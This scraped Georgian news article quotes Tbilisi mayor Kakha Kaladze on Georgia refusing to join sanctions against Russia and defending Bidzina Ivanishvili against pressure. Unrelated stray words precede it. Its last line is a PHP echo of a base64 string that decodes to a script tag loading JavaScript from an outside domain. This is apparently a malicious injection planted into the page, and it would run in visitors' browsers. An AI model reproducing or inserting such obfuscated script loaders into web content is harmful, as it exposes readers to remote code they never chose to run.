celsiusi
ავერსი შნაიდერი

ჩვენ ღიად განვაცხადეთ, რომ არ ვუერთდებით სანქციებს, რადგან არ გვინდოდა, დაგვეზიანებინა ჩვენი ქვეყანა, საკუთარი ხალხი. დღეს ყველაზე მთავარი, მნიშვნელოვანი არის მშვიდობა, ეკონომიკური განვითარება, – ამის შესახებ დედაქალაქის მერმა, კახა კალაძემ განაცხადა.

კახა კალაძეს კითხვით მიმართეს, როგორ შეაფასებდა იმას, რომ გარე აქტორების მხრიდან ბიძინა ივანიშვილის სანქცირებასთან დაკავშირებით მოწოდებები გახშირდა.

კალაძის განცხადებით, დღეს ყველაზე მეტი შეტევა არის ივანიშვილზე და საზოგადოებისთვის ყველაფერი ნათელია, რატომ ხდება ეს.

„ზეწოლა გრძელდება. ბოლო თვეების განმავლობაში რასაც განცხადებების სახით ვისმენთ, ამასთან დაკავშირებით ყველამ ვიცით, რა არის მთავარი მიზეზი, რატომ ხდება, რატომ არის ეს დამოკიდებულება საქართველოს ხელისუფლების მიმართ. ჩვენ აბსოლუტურად ღიად განვაცხადეთ, რომ არ ვუერთდებით სანქციებს. არ გვინდოდა, დაგვეზიანებინა ჩვენი ქვეყანა, საკუთარი ხალხი, ჩვენი ქვეყნის მოსახლეობა. როგორ შეიძლება, ახლა ჩვენ შევუერთდეთ სანქციებს? დარწმუნებული ვართ იმაში, რომ ამით რუსეთს დავაზიანებთ? პირიქით, საკუთარ თავს დავიზიანებთ. იგივეა მეორე ფრონტის გახსნასთან დაკავშირებით, ჩვენ ხომ გამოვიარეთ ეს ყველაფერი, ჩვენ ხომ გადავიხადეთ საფასური, ხომ ვიცით, რამხელა უბედურება მოაქვს ომს, რამხელა ზიანი მოგვაყენა 2008 წელმა. ამიტომ დღეს ყველაზე მთავარი, მნიშვნელოვანი არის მშვიდობა, სტაბილურობა, ეკონომიკური განვითარება. ყველაზე მეტი შეტევა არის ბიძინა ივანიშვილზე. თანხები ყოველგვარი კანონის გვერდის ავლით გაუჩერეს შვეიცარიაში, ვერანაირი ახსნა-განმარტება ვერ მოიძებნა, რატომ ხდება ეს ყველაფერი, თუმცა ჩვენთვის, საზოგადოებისთვის ყველაფერი ნათელია“, – განაცხადა კახა კალაძემ.

კიდევ ერთ კითხვაზე, რა მოხდება იმ შემთხვევაში, თუ ბიძინა ივანიშვილის მიმართ სანქციები ფორმალურ სახეს მიიღებს, რა შედეგები შეიძლება, მოიტანოს ამ ყველაფერმა, კახა კალაძემ აღნიშნა, რომ ივანიშვილს თანხებით ვერ დააშანტაჟებენ.

„შედეგს ვერ მიიღებენ, რადგან არ იცნობენ ბიძინა ივანიშვილს. ივანიშვილს ნამდვილად ვერ დააშანტაჟებენ თანხებით, ფინანსური სანქციებით, რომ ამის გამო რაღაც არასწორი გადაწყვეტილება მიიღოს და ქვეყნის, ხალხის საწინააღმდეგოდ გადადგას ნაბიჯი. ბიძინა ივანიშვილის ფენომენს არ იცნობენ და ეს არის სამწუხარო რეალობა“, – აღნიშნა კახა კალაძემ. 

233
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");